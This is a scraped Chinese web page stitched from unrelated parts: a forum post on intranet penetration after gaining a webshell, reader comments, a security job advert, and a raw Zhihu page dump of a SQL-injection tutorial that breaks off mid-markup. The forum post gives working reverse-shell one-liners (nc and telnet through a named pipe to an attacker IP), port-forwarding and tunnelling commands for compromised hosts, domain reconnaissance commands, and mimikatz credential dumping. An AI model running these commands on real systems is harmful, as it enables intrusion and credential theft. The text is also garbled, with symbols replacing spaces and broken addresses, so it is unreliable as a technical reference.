web渗透测试工程师哪家公司好

[原创]内网渗透
当我们获取到一个webshell的时候,发现外网ip无法链接,但3389开放,那很有可能是内网服务器,下面我们将介绍几款有关内网转发的工具。内网转发的工具1、Lcx.exe工具使用首先远程目标系统要开启远程访问功能(若未开可通过开3389命令开启).lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。首先在本地进行监听,监听51端口并转发到33891端口lcx.exe&-listen&51&33891在webshell中运行lcx.exe&-slave&192.168.1.100&51&192.168.80.139&3389远程桌面访问33891端口使用创建的用户名密码登录服务器2、Reduh内网反弹服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本地要安装jdk。这里我们以php网站为例,首先将php文件上传到服务器端。浏览器中访问上传的webshell,提示以下内容说明解析成功用客户端连接服务端java&-jar&reDuhClient.jar&http://192.168.80.139/zvuldrill/reDuh.php本地连接1010端口nc.exe&-vv&localhost&1010
[createTunnel].0.1:3389远程登录3、Tunna内网反弹以下为后门文件,该工具是Python所写,需要Python环境,同样有jsp、aspx、php版本的webshell这里使用php网站进行测试,上传php后门python&proxy.py&-u&http://192.168.80.139/zvuldrill/conn.php&-l&1234&-r&3389&-v&–s远程连接4、Linux系统通过nc反弹shell首先,攻击端进行监听nc.exe&-lvnp&2333服务器端执行mknod&/tmp/backpipe&p/bin/sh&0&/tmp/backpipe&|&nc&192.168.1.101&2333&1&/tmp/backpipeIp为攻击端ip执行命令,查看发现反弹成功5、内置命令反弹nc.exe&-lvnp&2333服务器端执行mknod&/tmp/backpipe&ptelnet&192.168.1.101&2333&0&backpipe&|&/bin/bash&1&backpipe反弹成功获取更多服务器上面讲了我们如何进入进入一台内网系统,既然我们已经获得了一台内网服务,那么我们如何获取更多服务器呢我们可能会想到目标系统是什么,安装了哪些应用,可能存在的漏洞等等。同样,我们需要收集信息,来帮助更好的入侵其他主机,下面是一些常用的cmd命令,还有很多可自行学习net&user&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&------&本机用户列表&
net&localhroup&administrators&&&&&&&&&&------&本机管理员[通常含有域用户]&
net&user&/domain&&&&&&&&&&&&&&&&&&&&&&&------&查询域用户&
net&group&/domain&&&&&&&&&&&&&&&&&&&&&&------&查询域里面的工作组
net&group&&domain&admins&&/domain&&&&&&------&查询域管理员用户组&
net&localgroup&administrators&/domain&&------&登录本机的域管理员
net&time&/domain&&&&&&&&&&&&&&&&&&&&&&&------&判断主域,主域服务器都做时间服务器&
net&config&workstation&&&&&&&&&&&&&&&&&------&当前登录域密码获取既然已经拿下服务器,那么我们就要获得服务器的密码,windows可以使用mimikatz获取用户名及密码,因为很有可能管理员将其他系统设置成相同的用户名密码。所以在其他内网系统可能同样适用。可以看到既有hash值,也有明文用户名密码。主机探测既然已经在一个内网,我们首先应该想到的就是探测有什么服务器,有哪些开放端口等等,可以使用nmap,扫描C段,看看有多少台在线服务器。扫描存活主机,既然是扫描存活主机,那么当然越快越好(个人喜好)nmap&-PE&-sn&-T4&192.168.80.1/24我们已经知道那些ip是存活主机,那么就可以进一步获取各个系统的开放端口nmap&-sS&-sV&-O&-p0-8.80.145可以看到开放的端口以及服务等服务器信息同样,在内网也会存在很多不打系统补丁的情况,类似这次“WannaCry”虽然补丁已经出现一段时间,各大安全公司也好,各个安全部门也好都会提前预警打补丁,但是呢,你懂的,所以说,对某些不需要使用的端口及服务,直接停掉,以免临时抱佛脚,伤不起啊……如果有系统漏洞,那么我们就可以使用matesploit进行溢出攻击等等弱口令同样,弱口令也是内网拿服务器的手段,说到弱口令就不得不说1433的mssql,3306的mysql,1521的Oracle,10050 的zabbix,7001的weblogic,8080的tomcat等等,都会存在弱口令的情况,但也存在被修改的情况,不过管理员嘛都是怕麻烦,会存在各种规律以免自己忘记,甚至有些管理员直接将某些账号密码写到某个文件夹中,这看你喽……嗅探也可以使用嗅探方法,如Cain,可以探测本地程序缓存的密码,通过嗅探器可以嗅探到相邻机器的username和password.。powershell & PowerSploitpowershellpowershell基础学习,如果想了解powershell渗透测试原理,需要进行简单脚本开发。推荐网址:http://www.pstips.net/powershell-executing-external-commands.html基础部分就不给大家在细介绍,大家可以根据提供网址进行学习。Powershell的优秀之处1.&代码运行在内存中可以不去接触磁盘
2.&从另一个系统中下载代码并执行
3.&很多安全产品并不能监测到powershell的活动
4.&cmd.exe通常被阻止运行,但是powershell不会。本次主要是简单介绍下powersploit,后续会出一套关于powershell系列课程。PowerSploitPowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。项目地址:https://github.com/PowerShellMafia/PowerSploit代码执行(CodeExecution)Invoke-DllInjectionInvoke-ReflectivePEInjectionInvoke-ShellcodeInvoke-WmiCommand脚本修改(ScriptModification)Out-EncodedCommandOut-CompressedDllOut-EncryptedScriptRemove-Comments权限维持(Persistence)New-UserPersistenceOptionNew-ElevatedPersistenceOptionAdd-PersistenceInstall-SSPGet-SecurityPackages绕过杀毒软件(AntivirusBypass)Find-AVSignature信息收集(Exfiltration)这个文件夹主要是收集目标主机上的信息。信息侦察(Recon)这个文件夹主要是以目标主机为跳板进行内网主机侦察。由于公众号长度不可控,下节会接着讲powershell系列,利用powershell进行内网渗透、密码嗅探、端口扫描等操作。
支付方式:
最新回复 (18)
有能给我普及一下大牛胡一刀的么
内网渗透涉及到的不只是几个弱口令,或者几个端口发弹
谢谢分享,来学习
此楼层已删除
有高手么?求认识
看看还是可以的
看不太懂怎么办?我要去自杀
看起来不错啊,试试
很详细。。。。。。
今天刚刚注册的看雪,有种捡到宝的感觉,web安全入门小白在此谢过各位大神!
支持一下,学习学习,
1.请先关注公众号。
2.点击菜单"更多"。
3.选择获取下载码。web安全与渗透测试工程师-渗透测试方向 - 天津信息安全测评有限公司 - 博客园招聘频道
浏览数:880
web安全与渗透测试工程师-渗透测试方向(该职位已截止)
工作地点:
工作年限:无要求
学历要求:无学历要求
职位类别:
工资范围:30K ~ 60K
福利待遇:
工作地点:全职或者兼职.月薪概述:30K~60k兼职酬劳:每单日结,态度认真、中介勿擾,請实力說話具有3年以上的渗透性测试或漏洞挖掘经验的薪资(年薪80W以上,以能力而定)
招聘人数:若干
发布日期:
更新日期:
截止日期:
负责信息安全服务项目(包括对信息系统的风险评估、下载某网站数据库、漏洞检测、安全渗透测试获权)的实施工作;
负责公司产品和业务的安全测试,能够配合开发人员修复安全问题;配合开发,发现和修复安全问题负责各类安全问题和安全事件的跟踪和分析 有效、快速处理各类安全隐患和安全事件搭建安全测试体系,能够持续完善安全测试框架建立有效的安全测试框架为业务团队提供安全测试技术支持;review技术方案,发现潜在安全隐患Review技术方案,进行安全隐患分析,提供安全测试报告进行安全漏洞研究,总结安全问题和解决办法 输出安全漏洞研究、安全问题解决办法文档参与具体公司项目,执行专项安全测试执行专项安全测试,产品上线无安全问题要求:1、工作经验要求:具备3年或以上测试或开发经验,1年以上的安全测试实战经验2、知识、技能、专业经验要求:1)对金融支付安全领域有较深入理解,熟悉金融安全问题和解决办法,熟悉各种web应用漏洞原理及攻击、防御办法;2)精通渗透测试,熟悉安全测试方法,熟练掌握各种渗透测试工具,熟悉常见安全攻防技术; 3)熟悉各类黑盒、白盒渗透测试方法,对常用渗透测试工具和黑客工具有较好的了解,能够搭建各类渗透测试的测试环境; 4)具有一定的编程能力,熟练掌握C/C++/Java语言中的一种或者多种3、专业素质能力要求: 1)主动性强,有较强责任感,具有良好的沟通能力,能够独立开展工作;2) 熟悉使用checkmarx工具相关工作经验者优先。
联系人:加载中...
联系电话:加载中...
联系手机:加载中...
公司地址:天津滨海新区第三大街金源大厦15楼
(提示:为了更好的效果,建议在投递简历时注明来自博客园)
天津信息安全测评有限公司
天津信息安全测评有限公司将渗透、漏扫等技术合法有效的利用在各种安全测试、检查领域,用于发现信息系统所存在的脆弱点,为必要的安全加固提供有效依据。天津信息安全测评有限公司多次配合网络安全管理部门进行信息安全方面检查工作,成为不可或缺的技术支撑力量。   与此同时,天津信息安全测评有限公司攻防实验室的建设将成为我国一支独立地、持久地对信息安全漏洞和安全防护进行研究的专业力量;实验室将致力于研究操作系统、网络设备、安全设备等存在的安全漏洞,研究黑客如何利用漏洞对客户信息资产进行侵害,研究通过何种防御手段降低安全风险和实现资产保护。web渗透测试常规套路赞赏还没有人赞赏,快来当第一个赞赏的人吧!60收藏分享举报文章被以下专栏收录合天网安实验室(www.hetianlab.com){&debug&:false,&apiRoot&:&&,&paySDK&:&https:\u002F\u002Fpay.zhihu.com\u002Fapi\u002Fjs&,&wechatConfigAPI&:&\u002Fapi\u002Fwechat\u002Fjssdkconfig&,&name&:&production&,&instance&:&column&,&tokens&:{&X-XSRF-TOKEN&:null,&X-UDID&:null,&Authorization&:&oauth c3cef7c66aa9e6a1e3160e20&}}{&database&:{&Post&:{&&:{&isPending&:false,&contributes&:[{&sourceColumn&:{&lastUpdated&:,&description&:&论一个黑客的自我修养&,&permission&:&COLUMN_PUBLIC&,&memberId&:,&contributePermission&:&COLUMN_PRIVATE&,&translatedCommentPermission&:&all&,&canManage&:true,&intro&:&合天网安实验室(www.hetianlab.com)&,&urlToken&:&hetianlab&,&id&:34984,&imagePath&:&v2-72bcd35eb211.jpg&,&slug&:&hetianlab&,&applyReason&:&0&,&name&:&网安实验室&,&title&:&网安实验室&,&url&:&https:\u002F\u002Fzhuanlan.zhihu.com\u002Fhetianlab&,&commentPermission&:&COLUMN_ALL_CAN_COMMENT&,&canPost&:true,&created&:,&state&:&COLUMN_NORMAL&,&followers&:581,&avatar&:{&id&:&v2-72bcd35eb211&,&template&:&https:\u002F\u002Fpic1.zhimg.com\u002F{id}_{size}.jpg&},&activateAuthorRequested&:false,&following&:false,&imageUrl&:&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-72bcd35eb211_l.jpg&,&articlesCount&:30},&state&:&accepted&,&targetPost&:{&titleImage&:&&,&lastUpdated&:,&imagePath&:&&,&permission&:&ARTICLE_PUBLIC&,&topics&:[],&summary&:&\u003Cb\u003E0x01\u003C\u002Fb\u003E本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透\u003Cb\u003E\u003Ca href=\&http:\u002F\u002Flib.csdn.net\u002Fbase\u002Fsoftwaretest\&\u003E测试\u003C\u002Fa\u003E\u003C\u002Fb\u003E网站的不可或缺的利器之一…&,&copyPermission&:&ARTICLE_COPYABLE&,&translatedCommentPermission&:&all&,&likes&:0,&origAuthorId&:0,&publishedTime&:&T13:36:13+08:00&,&sourceUrl&:&&,&urlToken&:,&id&:3649401,&withContent&:false,&slug&:,&bigTitleImage&:false,&title&:&web渗透测试常规套路&,&url&:&\u002Fp\u002F&,&commentPermission&:&ARTICLE_ALL_CAN_COMMENT&,&snapshotUrl&:&&,&created&:,&comments&:0,&columnId&:0,&content&:&&,&parentId&:0,&state&:&ARTICLE_PUBLISHED&,&imageUrl&:&&,&author&:{&bio&:&合天网安实验室(www.hetianlab.com)&,&isFollowing&:false,&hash&:&8f00d0c687dda7afb59deff&,&uid&:031500,&isOrg&:false,&slug&:&chu-shi-wei-xia&,&isFollowed&:false,&description&:&合天网安实验室&,&name&:&初识微夏&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Fchu-shi-wei-xia&,&avatar&:{&id&:&v2-bd8f3becf13&,&template&:&https:\u002F\u002Fpic3.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false},&memberId&:,&excerptTitle&:&&,&voteType&:&ARTICLE_VOTE_CLEAR&},&id&:776666}],&title&:&web渗透测试常规套路&,&author&:&chu-shi-wei-xia&,&content&:&\u003Ch2\u003E\u003Cb\u003E0x01\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透\u003Cb\u003E\u003Ca href=\&https:\u002F\u002Flink.zhihu.com\u002F?target=http%3A\u002F\u002Flib.csdn.net\u002Fbase\u002Fsoftwaretest\& class=\& wrap external\& target=\&_blank\& rel=\&nofollow noreferrer\&\u003E测试\u003C\u002Fa\u003E\u003C\u002Fb\u003E网站的不可或缺的利器之一。\u003C\u002Fp\u003E\u003Cp\u003E另:面向学生的CTF,出题者考虑到学生的实操能力,设计的web题,或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。\u003C\u002Fp\u003E\u003Cp\u003E说明:此次环境来自某网站的靶场,因为比较经典,所以 笔者将以此为例介绍web渗透测试中需要涉及的套路、工具等。网络安全法出来了,刚入门的小白就不要去动真实的网站了,不然真是从入门到入狱了。\u003C\u002Fp\u003E\u003Cp\u003E场景模拟:此刻你已获权测试某网站,你将在接下来的一段时间里进行测试,注意不要泄露网站敏感数据,所以接下里的所有图片将会以打码方式呈现\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E0x02\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E准备工作:\u003C\u002Fp\u003E\u003Cp\u003E准备好以下工具:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E拿到一个网站,首先我们最容易想到的就是扫描目录。\u003C\u002Fp\u003E\u003Cp\u003E最常用的工具是御剑,页面如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2b4622f1_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&402\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2b4622f1_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='402'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&402\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2b4622f1_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2b4622f1_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E在域名空格中输入我们测试的网站的域名,点击开始扫描即可\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-f04cd5a214194_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&405\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-f04cd5a214194_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='405'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&405\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-f04cd5a214194_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-f04cd5a214194_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E我们在结果中发现\u002Fadmin,这疑似后台页面,双击该链接进入,看看判断是否正确\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-e9463d8ebbf68c8248ed_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&208\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-e9463d8ebbf68c8248ed_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='208'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&208\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-e9463d8ebbf68c8248ed_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-e9463d8ebbf68c8248ed_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E可以看到确实是后台登陆页面\u003C\u002Fp\u003E\u003Cp\u003E找到后台登陆界面了,接下来我们就需要登陆的用户名和密码了,所以寻找用户名和密码就是我们下一步的工作\u003C\u002Fp\u003E\u003Cp\u003E这一步我们用到的工具是Domain3.6,界面如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-cf5de981bbb60675f5bd_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&469\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-cf5de981bbb60675f5bd_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='469'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&469\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-cf5de981bbb60675f5bd_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-cf5de981bbb60675f5bd_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击SQL注入—》批量扫描注入点—》添加网址,输入网址\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-2c91d8d689c225af57c3e6d_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&428\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-2c91d8d689c225af57c3e6d_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='428'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&428\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-2c91d8d689c225af57c3e6d_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-2c91d8d689c225af57c3e6d_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击OK,然后点击批量分析注入点\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-1fb1acfc77adc_b.jpg\& data-rawwidth=\&505\& data-rawheight=\&94\& class=\&origin_image zh-lightbox-thumb\& width=\&505\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-1fb1acfc77adc_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='505'%20height='94'&&\u002Fsvg&\& data-rawwidth=\&505\& data-rawheight=\&94\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&505\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-1fb1acfc77adc_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-1fb1acfc77adc_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E得到结果如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-74fbfdcd6fc0a5db14a94b7ba8a94a91_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&537\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-74fbfdcd6fc0a5db14a94b7ba8a94a91_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='537'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&537\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-74fbfdcd6fc0a5db14a94b7ba8a94a91_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-74fbfdcd6fc0a5db14a94b7ba8a94a91_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击OK关闭弹窗,在注入点栏目下随机选择一条,右击选择“检测注入”\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-19ab0c411bf072e787a414f_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&148\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-19ab0c411bf072e787a414f_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='148'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&148\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-19ab0c411bf072e787a414f_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-19ab0c411bf072e787a414f_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E如图所示\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-fd38c07ddad6a40ffe84679_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&163\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-fd38c07ddad6a40ffe84679_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='163'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&163\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-fd38c07ddad6a40ffe84679_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-fd38c07ddad6a40ffe84679_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击“开始检测”,得到结果如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-4556adc68c2bd59dbfdcebaf65041b44_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&178\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-4556adc68c2bd59dbfdcebaf65041b44_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='178'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&178\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-4556adc68c2bd59dbfdcebaf65041b44_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-4556adc68c2bd59dbfdcebaf65041b44_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击“猜解表名”\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-ee8abbd6173_b.jpg\& data-rawwidth=\&143\& data-rawheight=\&296\& class=\&content_image\& width=\&143\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='143'%20height='296'&&\u002Fsvg&\& data-rawwidth=\&143\& data-rawheight=\&296\& class=\&content_image lazy\& width=\&143\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-ee8abbd6173_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E在结果中选择admin\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-e922ee90262fbb9d13c99d2dd91f3ef8_b.jpg\& data-rawwidth=\&393\& data-rawheight=\&365\& class=\&content_image\& width=\&393\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='393'%20height='365'&&\u002Fsvg&\& data-rawwidth=\&393\& data-rawheight=\&365\& class=\&content_image lazy\& width=\&393\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-e922ee90262fbb9d13c99d2dd91f3ef8_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E选中admin后点击猜解列名\u003C\u002Fp\u003E\u003Cp\u003E得到结果如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-80c71a2dbfbd41d4e131ac_b.jpg\& data-rawwidth=\&292\& data-rawheight=\&283\& class=\&content_image\& width=\&292\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='292'%20height='283'&&\u002Fsvg&\& data-rawwidth=\&292\& data-rawheight=\&283\& class=\&content_image lazy\& width=\&292\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-80c71a2dbfbd41d4e131ac_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003EUsername,password是我们需要的信息,所以在前面的方框中勾选,点击猜解内容,如下图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-55f64e1f54fe_b.jpg\& data-rawwidth=\&286\& data-rawheight=\&288\& class=\&content_image\& width=\&286\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='286'%20height='288'&&\u002Fsvg&\& data-rawwidth=\&286\& data-rawheight=\&288\& class=\&content_image lazy\& width=\&286\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-55f64e1f54fe_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E结果如下图,成功得到用户名和密码\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-0affcb2a6a25906ddec3a3da88c71995_b.jpg\& data-rawwidth=\&506\& data-rawheight=\&426\& class=\&origin_image zh-lightbox-thumb\& width=\&506\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-0affcb2a6a25906ddec3a3da88c71995_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='506'%20height='426'&&\u002Fsvg&\& data-rawwidth=\&506\& data-rawheight=\&426\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&506\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-0affcb2a6a25906ddec3a3da88c71995_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-0affcb2a6a25906ddec3a3da88c71995_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E不过密码很明显是md5加密后的\u003C\u002Fp\u003E\u003Cp\u003E我们在Md5在线解密网站中解密即可\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d05e8f0cdc33ecec6f37_b.jpg\& data-rawwidth=\&532\& data-rawheight=\&141\& class=\&origin_image zh-lightbox-thumb\& width=\&532\& 